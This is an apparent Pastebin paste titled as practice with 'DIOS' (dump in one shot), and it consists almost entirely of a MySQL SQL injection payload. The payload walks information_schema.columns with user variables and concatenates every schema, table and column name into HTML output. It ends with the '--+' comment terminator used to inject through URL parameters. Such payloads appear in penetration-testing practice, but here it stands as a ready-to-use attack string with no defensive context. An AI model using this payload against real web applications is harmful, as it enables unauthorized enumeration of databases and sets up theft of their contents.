Advertisement
Kyfx

Little more practice with DIOS :->

Aug 14th, 2015
383
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.40 KB | None | 0 0
  1. Little more practice with DIOS :->
  2. (
  3. select (@a) from
  4. (
  5. select (@a:=0x00),(@tbl:=0x00),
  6. (
  7. select (@a) from (information_schema.columns) where (table_schema!='information_schema') and (@a) in
  8. (
  9. @a:=concat(
  10. @a,'<br>',
  11. if(
  12. (@tbl!=table_name),
  13. concat('<br>','Database:-> ',table_schema,' | Table Name :->',table_name,' | Column Name :->',column_name,'<br>'),
  14. (column_name)
  15. )
  16. )
  17. )
  18. )
  19. )
  20. a)
  21. --+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement